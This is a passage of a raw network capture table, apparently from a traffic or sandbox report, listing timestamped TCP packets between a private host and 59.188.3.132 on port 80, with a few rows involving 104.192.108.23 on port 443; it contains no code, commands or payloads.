                                                                                                                                                              Mar 13, 2023 05:27:24.815799952 CET804970359.188.3.132192.168.2.3
                                                                                                                                                              Mar 13, 2023 05:27:24.836878061 CET804970259.188.3.132192.168.2.3
                                                                                                                                                              Mar 13, 2023 05:27:24.836927891 CET804970259.188.3.132192.168.2.3
                                                                                                                                                              Mar 13, 2023 05:27:24.837042093 CET4970280192.168.2.359.188.3.132
                                                                                                                                                              Mar 13, 2023 05:27:24.843262911 CET804970359.188.3.132192.168.2.3
                                                                                                                                                              Mar 13, 2023 05:27:24.843333960 CET804970359.188.3.132192.168.2.3
                                                                                                                                                              Mar 13, 2023 05:27:24.843384981 CET4970380192.168.2.359.188.3.132
                                                                                                                                                              Mar 13, 2023 05:27:24.843471050 CET804970359.188.3.132192.168.2.3
                                                                                                                                                              Mar 13, 2023 05:27:24.843545914 CET4970380192.168.2.359.188.3.132
                                                                                                                                                              Mar 13, 2023 05:27:24.843578100 CET804970359.188.3.132192.168.2.3
                                                                                                                                                              Mar 13, 2023 05:27:24.843624115 CET804970359.188.3.132192.168.2.3
                                                                                                                                                              Mar 13, 2023 05:27:24.843681097 CET4970380192.168.2.359.188.3.132
                                                                                                                                                              Mar 13, 2023 05:27:24.843784094 CET804970359.188.3.132192.168.2.3
                                                                                                                                                              Mar 13, 2023 05:27:24.850950003 CET804970959.188.3.132192.168.2.3
                                                                                                                                                              Mar 13, 2023 05:27:24.851015091 CET804970959.188.3.132192.168.2.3
                                                                                                                                                              Mar 13, 2023 05:27:24.851102114 CET4970980192.168.2.359.188.3.132
                                                                                                                                                              Mar 13, 2023 05:27:24.867305994 CET804970259.188.3.132192.168.2.3
                                                                                                                                                              Mar 13, 2023 05:27:24.867393970 CET804970259.188.3.132192.168.2.3
                                                                                                                                                              Mar 13, 2023 05:27:24.867513895 CET4970280192.168.2.359.188.3.132
                                                                                                                                                              Mar 13, 2023 05:27:24.874711037 CET804970359.188.3.132192.168.2.3
                                                                                                                                                              Mar 13, 2023 05:27:24.874782085 CET804970359.188.3.132192.168.2.3
                                                                                                                                                              Mar 13, 2023 05:27:24.874821901 CET4970380192.168.2.359.188.3.132
                                                                                                                                                              Mar 13, 2023 05:27:24.879220009 CET804970959.188.3.132192.168.2.3
                                                                                                                                                              Mar 13, 2023 05:27:24.879287958 CET804970959.188.3.132192.168.2.3
                                                                                                                                                              Mar 13, 2023 05:27:24.879374027 CET804970959.188.3.132192.168.2.3
                                                                                                                                                              Mar 13, 2023 05:27:24.879401922 CET4970980192.168.2.359.188.3.132
                                                                                                                                                              Mar 13, 2023 05:27:24.879467964 CET804970959.188.3.132192.168.2.3
                                                                                                                                                              Mar 13, 2023 05:27:24.879539967 CET4970980192.168.2.359.188.3.132
                                                                                                                                                              Mar 13, 2023 05:27:24.879590034 CET804970959.188.3.132192.168.2.3
                                                                                                                                                              Mar 13, 2023 05:27:24.879730940 CET804970959.188.3.132192.168.2.3
                                                                                                                                                              Mar 13, 2023 05:27:24.879802942 CET4970980192.168.2.359.188.3.132
                                                                                                                                                              Mar 13, 2023 05:27:24.897685051 CET804970259.188.3.132192.168.2.3
                                                                                                                                                              Mar 13, 2023 05:27:24.897753954 CET804970259.188.3.132192.168.2.3
                                                                                                                                                              Mar 13, 2023 05:27:24.897840023 CET804970259.188.3.132192.168.2.3
                                                                                                                                                              Mar 13, 2023 05:27:24.897952080 CET804970259.188.3.132192.168.2.3
                                                                                                                                                              Mar 13, 2023 05:27:24.897968054 CET4970280192.168.2.359.188.3.132
                                                                                                                                                              Mar 13, 2023 05:27:24.898056030 CET4970280192.168.2.359.188.3.132
                                                                                                                                                              Mar 13, 2023 05:27:24.898067951 CET804970259.188.3.132192.168.2.3
                                                                                                                                                              Mar 13, 2023 05:27:24.898217916 CET804970259.188.3.132192.168.2.3
                                                                                                                                                              Mar 13, 2023 05:27:24.898294926 CET4970280192.168.2.359.188.3.132
                                                                                                                                                              Mar 13, 2023 05:27:24.938637972 CET804970959.188.3.132192.168.2.3
                                                                                                                                                              Mar 13, 2023 05:27:25.012881041 CET4970380192.168.2.359.188.3.132
                                                                                                                                                              Mar 13, 2023 05:27:25.039969921 CET804970259.188.3.132192.168.2.3
                                                                                                                                                              Mar 13, 2023 05:27:25.040090084 CET804970259.188.3.132192.168.2.3
                                                                                                                                                              Mar 13, 2023 05:27:25.040220022 CET4970280192.168.2.359.188.3.132
                                                                                                                                                              Mar 13, 2023 05:27:25.046175003 CET804970359.188.3.132192.168.2.3
                                                                                                                                                              Mar 13, 2023 05:27:25.046247005 CET804970359.188.3.132192.168.2.3
                                                                                                                                                              Mar 13, 2023 05:27:25.046303988 CET804970359.188.3.132192.168.2.3
                                                                                                                                                              Mar 13, 2023 05:27:25.046349049 CET4970380192.168.2.359.188.3.132
                                                                                                                                                              Mar 13, 2023 05:27:25.046432972 CET804970359.188.3.132192.168.2.3
                                                                                                                                                              Mar 13, 2023 05:27:25.046493053 CET804970359.188.3.132192.168.2.3
                                                                                                                                                              Mar 13, 2023 05:27:25.046514034 CET4970380192.168.2.359.188.3.132
                                                                                                                                                              Mar 13, 2023 05:27:25.046664000 CET804970359.188.3.132192.168.2.3
                                                                                                                                                              Mar 13, 2023 05:27:25.046742916 CET4970380192.168.2.359.188.3.132
                                                                                                                                                              Mar 13, 2023 05:27:25.046745062 CET804970359.188.3.132192.168.2.3
                                                                                                                                                              Mar 13, 2023 05:27:25.053793907 CET804970959.188.3.132192.168.2.3
                                                                                                                                                              Mar 13, 2023 05:27:25.053860903 CET804970959.188.3.132192.168.2.3
                                                                                                                                                              Mar 13, 2023 05:27:25.053905010 CET4970980192.168.2.359.188.3.132
                                                                                                                                                              Mar 13, 2023 05:27:25.053947926 CET804970959.188.3.132192.168.2.3
                                                                                                                                                              Mar 13, 2023 05:27:25.054017067 CET4970980192.168.2.359.188.3.132
                                                                                                                                                              Mar 13, 2023 05:27:25.070544958 CET804970259.188.3.132192.168.2.3
                                                                                                                                                              Mar 13, 2023 05:27:25.070614100 CET804970259.188.3.132192.168.2.3
                                                                                                                                                              Mar 13, 2023 05:27:25.070748091 CET4970280192.168.2.359.188.3.132
                                                                                                                                                              Mar 13, 2023 05:27:25.077573061 CET804970359.188.3.132192.168.2.3
                                                                                                                                                              Mar 13, 2023 05:27:25.077639103 CET804970359.188.3.132192.168.2.3
                                                                                                                                                              Mar 13, 2023 05:27:25.077723026 CET4970380192.168.2.359.188.3.132
                                                                                                                                                              Mar 13, 2023 05:27:25.082034111 CET804970959.188.3.132192.168.2.3
                                                                                                                                                              Mar 13, 2023 05:27:25.082101107 CET804970959.188.3.132192.168.2.3
                                                                                                                                                              Mar 13, 2023 05:27:25.082190037 CET804970959.188.3.132192.168.2.3
                                                                                                                                                              Mar 13, 2023 05:27:25.082241058 CET4970980192.168.2.359.188.3.132
                                                                                                                                                              Mar 13, 2023 05:27:25.082312107 CET804970959.188.3.132192.168.2.3
                                                                                                                                                              Mar 13, 2023 05:27:25.082370996 CET804970959.188.3.132192.168.2.3
                                                                                                                                                              Mar 13, 2023 05:27:25.082412004 CET4970980192.168.2.359.188.3.132
                                                                                                                                                              Mar 13, 2023 05:27:25.082541943 CET804970959.188.3.132192.168.2.3
                                                                                                                                                              Mar 13, 2023 05:27:25.082614899 CET4970980192.168.2.359.188.3.132
                                                                                                                                                              Mar 13, 2023 05:27:25.101054907 CET804970259.188.3.132192.168.2.3
                                                                                                                                                              Mar 13, 2023 05:27:25.101167917 CET804970259.188.3.132192.168.2.3
                                                                                                                                                              Mar 13, 2023 05:27:25.101233006 CET804970259.188.3.132192.168.2.3
                                                                                                                                                              Mar 13, 2023 05:27:25.101289034 CET804970259.188.3.132192.168.2.3
                                                                                                                                                              Mar 13, 2023 05:27:25.101309061 CET4970280192.168.2.359.188.3.132
                                                                                                                                                              Mar 13, 2023 05:27:25.101346016 CET804970259.188.3.132192.168.2.3
                                                                                                                                                              Mar 13, 2023 05:27:25.101382017 CET4970280192.168.2.359.188.3.132
                                                                                                                                                              Mar 13, 2023 05:27:25.101402044 CET804970259.188.3.132192.168.2.3
                                                                                                                                                              Mar 13, 2023 05:27:25.101464987 CET4970280192.168.2.359.188.3.132
                                                                                                                                                              Mar 13, 2023 05:27:25.212950945 CET4970380192.168.2.359.188.3.132
                                                                                                                                                              Mar 13, 2023 05:27:25.216152906 CET804970359.188.3.132192.168.2.3
                                                                                                                                                              Mar 13, 2023 05:27:25.243065119 CET804970259.188.3.132192.168.2.3
                                                                                                                                                              Mar 13, 2023 05:27:25.243140936 CET804970259.188.3.132192.168.2.3
                                                                                                                                                              Mar 13, 2023 05:27:25.243204117 CET804970259.188.3.132192.168.2.3
                                                                                                                                                              Mar 13, 2023 05:27:25.243242025 CET4970280192.168.2.359.188.3.132
                                                                                                                                                              Mar 13, 2023 05:27:25.249243021 CET804970359.188.3.132192.168.2.3
                                                                                                                                                              Mar 13, 2023 05:27:25.249308109 CET804970359.188.3.132192.168.2.3
                                                                                                                                                              Mar 13, 2023 05:27:25.249365091 CET4970380192.168.2.359.188.3.132
                                                                                                                                                              Mar 13, 2023 05:27:25.249428034 CET804970359.188.3.132192.168.2.3
                                                                                                                                                              Mar 13, 2023 05:27:25.249489069 CET804970359.188.3.132192.168.2.3
                                                                                                                                                              Mar 13, 2023 05:27:25.249511003 CET4970380192.168.2.359.188.3.132
                                                                                                                                                              Mar 13, 2023 05:27:25.249660015 CET804970359.188.3.132192.168.2.3
                                                                                                                                                              Mar 13, 2023 05:27:25.249722958 CET804970359.188.3.132192.168.2.3
                                                                                                                                                              Mar 13, 2023 05:27:25.249746084 CET4970380192.168.2.359.188.3.132
                                                                                                                                                              Mar 13, 2023 05:27:25.256949902 CET804970959.188.3.132192.168.2.3
                                                                                                                                                              Mar 13, 2023 05:27:25.257036924 CET804970959.188.3.132192.168.2.3
                                                                                                                                                              Mar 13, 2023 05:27:25.257098913 CET804970959.188.3.132192.168.2.3
                                                                                                                                                              Mar 13, 2023 05:27:25.257124901 CET4970980192.168.2.359.188.3.132
                                                                                                                                                              Mar 13, 2023 05:27:25.257157087 CET804970959.188.3.132192.168.2.3
                                                                                                                                                              Mar 13, 2023 05:27:25.257224083 CET4970980192.168.2.359.188.3.132
                                                                                                                                                              Mar 13, 2023 05:27:25.273699999 CET804970259.188.3.132192.168.2.3
                                                                                                                                                              Mar 13, 2023 05:27:25.273782015 CET804970259.188.3.132192.168.2.3
                                                                                                                                                              Mar 13, 2023 05:27:25.273891926 CET4970280192.168.2.359.188.3.132
                                                                                                                                                              Mar 13, 2023 05:27:25.280710936 CET804970359.188.3.132192.168.2.3
                                                                                                                                                              Mar 13, 2023 05:27:25.280781984 CET804970359.188.3.132192.168.2.3
                                                                                                                                                              Mar 13, 2023 05:27:25.280837059 CET4970380192.168.2.359.188.3.132
                                                                                                                                                              Mar 13, 2023 05:27:25.285434961 CET804970959.188.3.132192.168.2.3
                                                                                                                                                              Mar 13, 2023 05:27:25.285504103 CET804970959.188.3.132192.168.2.3
                                                                                                                                                              Mar 13, 2023 05:27:25.285590887 CET804970959.188.3.132192.168.2.3
                                                                                                                                                              Mar 13, 2023 05:27:25.285625935 CET4970980192.168.2.359.188.3.132
                                                                                                                                                              Mar 13, 2023 05:27:25.285682917 CET804970959.188.3.132192.168.2.3
                                                                                                                                                              Mar 13, 2023 05:27:25.285747051 CET804970959.188.3.132192.168.2.3
                                                                                                                                                              Mar 13, 2023 05:27:25.285763025 CET4970980192.168.2.359.188.3.132
                                                                                                                                                              Mar 13, 2023 05:27:25.285828114 CET804970959.188.3.132192.168.2.3
                                                                                                                                                              Mar 13, 2023 05:27:25.285902023 CET4970980192.168.2.359.188.3.132
                                                                                                                                                              Mar 13, 2023 05:27:25.304372072 CET804970259.188.3.132192.168.2.3
                                                                                                                                                              Mar 13, 2023 05:27:25.304435968 CET804970259.188.3.132192.168.2.3
                                                                                                                                                              Mar 13, 2023 05:27:25.304512978 CET804970259.188.3.132192.168.2.3
                                                                                                                                                              Mar 13, 2023 05:27:25.304536104 CET4970280192.168.2.359.188.3.132
                                                                                                                                                              Mar 13, 2023 05:27:25.304558039 CET804970259.188.3.132192.168.2.3
                                                                                                                                                              Mar 13, 2023 05:27:25.304586887 CET4970280192.168.2.359.188.3.132
                                                                                                                                                              Mar 13, 2023 05:27:25.412914038 CET4970380192.168.2.359.188.3.132
                                                                                                                                                              Mar 13, 2023 05:27:25.415853024 CET804970359.188.3.132192.168.2.3
                                                                                                                                                              Mar 13, 2023 05:27:25.452361107 CET804970359.188.3.132192.168.2.3
                                                                                                                                                              Mar 13, 2023 05:27:25.452501059 CET804970359.188.3.132192.168.2.3
                                                                                                                                                              Mar 13, 2023 05:27:25.452542067 CET4970380192.168.2.359.188.3.132
                                                                                                                                                              Mar 13, 2023 05:27:25.452733040 CET804970359.188.3.132192.168.2.3
                                                                                                                                                              Mar 13, 2023 05:27:25.452816963 CET4970380192.168.2.359.188.3.132
                                                                                                                                                              Mar 13, 2023 05:27:25.452900887 CET804970359.188.3.132192.168.2.3
                                                                                                                                                              Mar 13, 2023 05:27:25.453154087 CET804970359.188.3.132192.168.2.3
                                                                                                                                                              Mar 13, 2023 05:27:25.453233004 CET4970380192.168.2.359.188.3.132
                                                                                                                                                              Mar 13, 2023 05:27:25.453296900 CET804970359.188.3.132192.168.2.3
                                                                                                                                                              Mar 13, 2023 05:27:25.459786892 CET804970959.188.3.132192.168.2.3
                                                                                                                                                              Mar 13, 2023 05:27:25.459836960 CET804970959.188.3.132192.168.2.3
                                                                                                                                                              Mar 13, 2023 05:27:25.459882021 CET804970959.188.3.132192.168.2.3
                                                                                                                                                              Mar 13, 2023 05:27:25.459958076 CET4970980192.168.2.359.188.3.132
                                                                                                                                                              Mar 13, 2023 05:27:25.460014105 CET804970959.188.3.132192.168.2.3
                                                                                                                                                              Mar 13, 2023 05:27:25.460416079 CET4970980192.168.2.359.188.3.132
                                                                                                                                                              Mar 13, 2023 05:27:25.483753920 CET804970359.188.3.132192.168.2.3
                                                                                                                                                              Mar 13, 2023 05:27:25.483808994 CET804970359.188.3.132192.168.2.3
                                                                                                                                                              Mar 13, 2023 05:27:25.483855963 CET804970359.188.3.132192.168.2.3
                                                                                                                                                              Mar 13, 2023 05:27:25.483936071 CET4970380192.168.2.359.188.3.132
                                                                                                                                                              Mar 13, 2023 05:27:25.483936071 CET4970380192.168.2.359.188.3.132
                                                                                                                                                              Mar 13, 2023 05:27:25.488481998 CET804970959.188.3.132192.168.2.3
                                                                                                                                                              Mar 13, 2023 05:27:25.488533020 CET804970959.188.3.132192.168.2.3
                                                                                                                                                              Mar 13, 2023 05:27:25.488579988 CET804970959.188.3.132192.168.2.3
                                                                                                                                                              Mar 13, 2023 05:27:25.488632917 CET4970980192.168.2.359.188.3.132
                                                                                                                                                              Mar 13, 2023 05:27:25.512933016 CET49879443192.168.2.3104.192.108.23
                                                                                                                                                              Mar 13, 2023 05:27:25.512975931 CET44349879104.192.108.23192.168.2.3
                                                                                                                                                              Mar 13, 2023 05:27:25.530953884 CET4970980192.168.2.359.188.3.132
                                                                                                                                                              Mar 13, 2023 05:27:25.530955076 CET4970280192.168.2.359.188.3.132
                                                                                                                                                              Mar 13, 2023 05:27:25.615983009 CET804970359.188.3.132192.168.2.3
                                                                                                                                                              Mar 13, 2023 05:27:25.655558109 CET804970359.188.3.132192.168.2.3
                                                                                                                                                              Mar 13, 2023 05:27:25.655625105 CET804970359.188.3.132192.168.2.3
                                                                                                                                                              Mar 13, 2023 05:27:25.655705929 CET804970359.188.3.132192.168.2.3
                                                                                                                                                              Mar 13, 2023 05:27:25.655718088 CET4970380192.168.2.359.188.3.132
                                                                                                                                                              Mar 13, 2023 05:27:25.655751944 CET804970359.188.3.132192.168.2.3
                                                                                                                                                              Mar 13, 2023 05:27:25.655772924 CET4970380192.168.2.359.188.3.132
                                                                                                                                                              Mar 13, 2023 05:27:25.655976057 CET804970359.188.3.132192.168.2.3
                                                                                                                                                              Mar 13, 2023 05:27:25.656023979 CET804970359.188.3.132192.168.2.3
                                                                                                                                                              Mar 13, 2023 05:27:25.656060934 CET4970380192.168.2.359.188.3.132
                                                                                                                                                              Mar 13, 2023 05:27:25.686837912 CET804970359.188.3.132192.168.2.3
                                                                                                                                                              Mar 13, 2023 05:27:25.686901093 CET804970359.188.3.132192.168.2.3
                                                                                                                                                              Mar 13, 2023 05:27:25.686980009 CET804970359.188.3.132192.168.2.3
                                                                                                                                                              Mar 13, 2023 05:27:25.687026024 CET804970359.188.3.132192.168.2.3
                                                                                                                                                              Mar 13, 2023 05:27:25.687046051 CET4970380192.168.2.359.188.3.132
                                                                                                                                                              Mar 13, 2023 05:27:25.687105894 CET4970380192.168.2.359.188.3.132
                                                                                                                                                              Mar 13, 2023 05:27:25.812978983 CET4970380192.168.2.359.188.3.132
                                                                                                                                                              Mar 13, 2023 05:27:25.858814001 CET804970359.188.3.132192.168.2.3
                                                                                                                                                              Mar 13, 2023 05:27:25.858879089 CET804970359.188.3.132192.168.2.3
                                                                                                                                                              Mar 13, 2023 05:27:25.858959913 CET804970359.188.3.132192.168.2.3
                                                                                                                                                              Mar 13, 2023 05:27:25.859006882 CET804970359.188.3.132192.168.2.3
                                                                                                                                                              Mar 13, 2023 05:27:25.859042883 CET4970380192.168.2.359.188.3.132
                                                                                                                                                              Mar 13, 2023 05:27:25.859054089 CET804970359.188.3.132192.168.2.3
                                                                                                                                                              Mar 13, 2023 05:27:25.859091997 CET4970380192.168.2.359.188.3.132
                                                                                                                                                              Mar 13, 2023 05:27:25.859100103 CET804970359.188.3.132192.168.2.3
                                                                                                                                                              Mar 13, 2023 05:27:25.859157085 CET4970380192.168.2.359.188.3.132
                                                                                                                                                              Mar 13, 2023 05:27:25.890027046 CET804970359.188.3.132192.168.2.3
                                                                                                                                                              Mar 13, 2023 05:27:25.890090942 CET804970359.188.3.132192.168.2.3
                                                                                                                                                              Mar 13, 2023 05:27:25.890171051 CET804970359.188.3.132192.168.2.3
                                                                                                                                                              Mar 13, 2023 05:27:25.890217066 CET804970359.188.3.132192.168.2.3
                                                                                                                                                              Mar 13, 2023 05:27:25.890259981 CET4970380192.168.2.359.188.3.132
                                                                                                                                                              Mar 13, 2023 05:27:25.890265942 CET804970359.188.3.132192.168.2.3
                                                                                                                                                              Mar 13, 2023 05:27:25.890312910 CET4970380192.168.2.359.188.3.132
                                                                                                                                                              Mar 13, 2023 05:27:26.016114950 CET804970359.188.3.132192.168.2.3
                                                                                                                                                              Mar 13, 2023 05:27:26.016294956 CET4970380192.168.2.359.188.3.132
                                                                                                                                                              Mar 13, 2023 05:27:26.061976910 CET804970359.188.3.132192.168.2.3
                                                                                                                                                              Mar 13, 2023 05:27:26.062041998 CET804970359.188.3.132192.168.2.3
                                                                                                                                                              Mar 13, 2023 05:27:26.062119007 CET804970359.188.3.132192.168.2.3
                                                                                                                                                              Mar 13, 2023 05:27:26.062165022 CET804970359.188.3.132192.168.2.3
                                                                                                                                                              Mar 13, 2023 05:27:26.062166929 CET4970380192.168.2.359.188.3.132
                                                                                                                                                              Mar 13, 2023 05:27:26.062242985 CET4970380192.168.2.359.188.3.132
                                                                                                                                                              Mar 13, 2023 05:27:26.062340021 CET804970359.188.3.132192.168.2.3
                                                                                                                                                              Mar 13, 2023 05:27:26.062433004 CET804970359.188.3.132192.168.2.3
                                                                                                                                                              Mar 13, 2023 05:27:26.062491894 CET4970380192.168.2.359.188.3.132
                                                                                                                                                              Mar 13, 2023 05:27:26.093331099 CET804970359.188.3.132192.168.2.3
                                                                                                                                                              Mar 13, 2023 05:27:26.093425035 CET804970359.188.3.132192.168.2.3
                                                                                                                                                              Mar 13, 2023 05:27:26.093470097 CET804970359.188.3.132192.168.2.3
                                                                                                                                                              Mar 13, 2023 05:27:26.093508005 CET4970380192.168.2.359.188.3.132
                                                                                                                                                              Mar 13, 2023 05:27:26.093517065 CET804970359.188.3.132192.168.2.3
                                                                                                                                                              Mar 13, 2023 05:27:26.093595028 CET4970380192.168.2.359.188.3.132
                                                                                                                                                              Mar 13, 2023 05:27:26.219157934 CET804970359.188.3.132192.168.2.3
                                                                                                                                                              Mar 13, 2023 05:27:26.219250917 CET804970359.188.3.132192.168.2.3
                                                                                                                                                              Mar 13, 2023 05:27:26.219346046 CET4970380192.168.2.359.188.3.132
                                                                                                                                                              Mar 13, 2023 05:27:26.265115976 CET804970359.188.3.132192.168.2.3
                                                                                                                                                              Mar 13, 2023 05:27:26.265177011 CET804970359.188.3.132192.168.2.3
                                                                                                                                                              Mar 13, 2023 05:27:26.265255928 CET804970359.188.3.132192.168.2.3
                                                                                                                                                              Mar 13, 2023 05:27:26.265305042 CET804970359.188.3.132192.168.2.3
                                                                                                                                                              Mar 13, 2023 05:27:26.265348911 CET804970359.188.3.132192.168.2.3
                                                                                                                                                              Mar 13, 2023 05:27:26.265414000 CET4970380192.168.2.359.188.3.132
                                                                                                                                                              Mar 13, 2023 05:27:26.265414000 CET4970380192.168.2.359.188.3.132
                                                                                                                                                              Mar 13, 2023 05:27:26.265471935 CET804970359.188.3.132192.168.2.3
                                                                                                                                                              Mar 13, 2023 05:27:26.265543938 CET4970380192.168.2.359.188.3.132
                                                                                                                                                              Mar 13, 2023 05:27:26.296284914 CET804970359.188.3.132192.168.2.3
                                                                                                                                                              Mar 13, 2023 05:27:26.296350002 CET804970359.188.3.132192.168.2.3
                                                                                                                                                              Mar 13, 2023 05:27:26.296396971 CET804970359.188.3.132192.168.2.3
                                                                                                                                                              Mar 13, 2023 05:27:26.296426058 CET4970380192.168.2.359.188.3.132
                                                                                                                                                              Mar 13, 2023 05:27:26.296509981 CET804970359.188.3.132192.168.2.3
                                                                                                                                                              Mar 13, 2023 05:27:26.296567917 CET4970380192.168.2.359.188.3.132
                                                                                                                                                              Mar 13, 2023 05:27:26.422219038 CET804970359.188.3.132192.168.2.3
                                                                                                                                                              Mar 13, 2023 05:27:26.422322035 CET804970359.188.3.132192.168.2.3
                                                                                                                                                              Mar 13, 2023 05:27:26.422374010 CET804970359.188.3.132192.168.2.3
                                                                                                                                                              Mar 13, 2023 05:27:26.422427893 CET4970380192.168.2.359.188.3.132
                                                                                                                                                              Mar 13, 2023 05:27:26.468389988 CET804970359.188.3.132192.168.2.3
                                                                                                                                                              Mar 13, 2023 05:27:26.468458891 CET804970359.188.3.132192.168.2.3
                                                                                                                                                              Mar 13, 2023 05:27:26.468537092 CET804970359.188.3.132192.168.2.3
                                                                                                                                                              Mar 13, 2023 05:27:26.468549967 CET4970380192.168.2.359.188.3.132
                                                                                                                                                              Mar 13, 2023 05:27:26.468580961 CET804970359.188.3.132192.168.2.3
                                                                                                                                                              Mar 13, 2023 05:27:26.468596935 CET4970380192.168.2.359.188.3.132
                                                                                                                                                              Mar 13, 2023 05:27:26.468628883 CET804970359.188.3.132192.168.2.3
                                                                                                                                                              Mar 13, 2023 05:27:26.468673944 CET804970359.188.3.132192.168.2.3
                                                                                                                                                              Mar 13, 2023 05:27:26.468689919 CET4970380192.168.2.359.188.3.132
                                                                                                                                                              Mar 13, 2023 05:27:26.499274015 CET804970359.188.3.132192.168.2.3
                                                                                                                                                              Mar 13, 2023 05:27:26.499337912 CET804970359.188.3.132192.168.2.3
                                                                                                                                                              Mar 13, 2023 05:27:26.499387026 CET4970380192.168.2.359.188.3.132
                                                                                                                                                              Mar 13, 2023 05:27:26.499413013 CET804970359.188.3.132192.168.2.3
                                                                                                                                                              Mar 13, 2023 05:27:26.499475956 CET4970380192.168.2.359.188.3.132
                                                                                                                                                              Mar 13, 2023 05:27:26.499524117 CET804970359.188.3.132192.168.2.3
                                                                                                                                                              Mar 13, 2023 05:27:26.612998009 CET4970380192.168.2.359.188.3.132
                                                                                                                                                              Mar 13, 2023 05:27:26.625184059 CET804970359.188.3.132192.168.2.3
                                                                                                                                                              Mar 13, 2023 05:27:26.625266075 CET804970359.188.3.132192.168.2.3
                                                                                                                                                              Mar 13, 2023 05:27:26.625396967 CET4970380192.168.2.359.188.3.132
                                                                                                                                                              Mar 13, 2023 05:27:26.671758890 CET804970359.188.3.132192.168.2.3
                                                                                                                                                              Mar 13, 2023 05:27:26.671825886 CET804970359.188.3.132192.168.2.3
                                                                                                                                                              Mar 13, 2023 05:27:26.671902895 CET804970359.188.3.132192.168.2.3
                                                                                                                                                              Mar 13, 2023 05:27:26.671953917 CET804970359.188.3.132192.168.2.3
                                                                                                                                                              Mar 13, 2023 05:27:26.671988964 CET4970380192.168.2.359.188.3.132
                                                                                                                                                              Mar 13, 2023 05:27:26.671999931 CET804970359.188.3.132192.168.2.3
                                                                                                                                                              Mar 13, 2023 05:27:26.672041893 CET4970380192.168.2.359.188.3.132
                                                                                                                                                              Mar 13, 2023 05:27:26.672162056 CET804970359.188.3.132192.168.2.3
                                                                                                                                                              Mar 13, 2023 05:27:26.672234058 CET4970380192.168.2.359.188.3.132
                                                                                                                                                              Mar 13, 2023 05:27:26.702091932 CET804970359.188.3.132192.168.2.3
                                                                                                                                                              Mar 13, 2023 05:27:26.702143908 CET804970359.188.3.132192.168.2.3
                                                                                                                                                              Mar 13, 2023 05:27:26.702287912 CET4970380192.168.2.359.188.3.132
                                                                                                                                                              Mar 13, 2023 05:27:26.702296019 CET804970359.188.3.132192.168.2.3
                                                                                                                                                              Mar 13, 2023 05:27:26.702347994 CET804970359.188.3.132192.168.2.3
                                                                                                                                                              Mar 13, 2023 05:27:26.702451944 CET4970380192.168.2.359.188.3.132
                                                                                                                                                              Mar 13, 2023 05:27:26.815908909 CET804970359.188.3.132192.168.2.3
                                                                                                                                                              Mar 13, 2023 05:27:26.828284979 CET804970359.188.3.132192.168.2.3
                                                                                                                                                              Mar 13, 2023 05:27:26.828367949 CET804970359.188.3.132192.168.2.3
                                                                                                                                                              Mar 13, 2023 05:27:26.828416109 CET804970359.188.3.132192.168.2.3
                                                                                                                                                              Mar 13, 2023 05:27:26.828459978 CET4970380192.168.2.359.188.3.132
                                                                                                                                                              Mar 13, 2023 05:27:26.828512907 CET4970380192.168.2.359.188.3.132
                                                                                                                                                              Mar 13, 2023 05:27:26.874849081 CET804970359.188.3.132192.168.2.3
                                                                                                                                                              Mar 13, 2023 05:27:26.874912977 CET804970359.188.3.132192.168.2.3
                                                                                                                                                              Mar 13, 2023 05:27:26.874959946 CET804970359.188.3.132192.168.2.3
                                                                                                                                                              Mar 13, 2023 05:27:26.875000000 CET4970380192.168.2.359.188.3.132
                                                                                                                                                              Mar 13, 2023 05:27:26.875049114 CET804970359.188.3.132192.168.2.3
                                                                                                                                                              Mar 13, 2023 05:27:26.875119925 CET4970380192.168.2.359.188.3.132
                                                                                                                                                              Mar 13, 2023 05:27:26.875163078 CET804970359.188.3.132192.168.2.3
                                                                                                                                                              Mar 13, 2023 05:27:26.875340939 CET804970359.188.3.132192.168.2.3
                                                                                                                                                              Mar 13, 2023 05:27:26.875406027 CET4970380192.168.2.359.188.3.132
                                                                                                                                                              Mar 13, 2023 05:27:26.905432940 CET804970359.188.3.132192.168.2.3
                                                                                                                                                              Mar 13, 2023 05:27:26.905533075 CET804970359.188.3.132192.168.2.3
                                                                                                                                                              Mar 13, 2023 05:27:26.905599117 CET804970359.188.3.132192.168.2.3
                                                                                                                                                              Mar 13, 2023 05:27:26.905618906 CET4970380192.168.2.359.188.3.132
                                                                                                                                                              Mar 13, 2023 05:27:26.905646086 CET804970359.188.3.132192.168.2.3
                                                                                                                                                              Mar 13, 2023 05:27:26.905706882 CET4970380192.168.2.359.188.3.132
                                                                                                                                                              Mar 13, 2023 05:27:27.031428099 CET804970359.188.3.132192.168.2.3
                                                                                                                                                              Mar 13, 2023 05:27:27.031527042 CET804970359.188.3.132192.168.2.3
                                                                                                                                                              Mar 13, 2023 05:27:27.031575918 CET804970359.188.3.132192.168.2.3
                                                                                                                                                              Mar 13, 2023 05:27:27.031622887 CET804970359.188.3.132192.168.2.3
                                                                                                                                                              Mar 13, 2023 05:27:27.031649113 CET4970380192.168.2.359.188.3.132
                                                                                                                                                              Mar 13, 2023 05:27:27.031706095 CET4970380192.168.2.359.188.3.132
                                                                                                                                                              Mar 13, 2023 05:27:27.077788115 CET804970359.188.3.132192.168.2.3
                                                                                                                                                              Mar 13, 2023 05:27:27.077860117 CET804970359.188.3.132192.168.2.3
                                                                                                                                                              Mar 13, 2023 05:27:27.077910900 CET804970359.188.3.132192.168.2.3
                                                                                                                                                              Mar 13, 2023 05:27:27.077965021 CET4970380192.168.2.359.188.3.132
                                                                                                                                                              Mar 13, 2023 05:27:27.078063011 CET804970359.188.3.132192.168.2.3
                                                                                                                                                              Mar 13, 2023 05:27:27.078110933 CET804970359.188.3.132192.168.2.3
                                                                                                                                                              Mar 13, 2023 05:27:27.078130960 CET4970380192.168.2.359.188.3.132
                                                                                                                                                              Mar 13, 2023 05:27:27.078299999 CET804970359.188.3.132192.168.2.3
                                                                                                                                                              Mar 13, 2023 05:27:27.078363895 CET4970380192.168.2.359.188.3.132
                                                                                                                                                              Mar 13, 2023 05:27:27.108572006 CET804970359.188.3.132192.168.2.3
                                                                                                                                                              Mar 13, 2023 05:27:27.108659983 CET804970359.188.3.132192.168.2.3
                                                                                                                                                              Mar 13, 2023 05:27:27.108686924 CET804970359.188.3.132192.168.2.3
                                                                                                                                                              Mar 13, 2023 05:27:27.108791113 CET4970380192.168.2.359.188.3.132
                                                                                                                                                              Mar 13, 2023 05:27:27.213046074 CET4970380192.168.2.359.188.3.132
                                                                                                                                                              Mar 13, 2023 05:27:28.575890064 CET804970759.188.3.132192.168.2.3
                                                                                                                                                              Mar 13, 2023 05:27:28.631149054 CET4970780192.168.2.359.188.3.132
                                                                                                                                                              Mar 13, 2023 05:27:28.759457111 CET4970380192.168.2.359.188.3.132
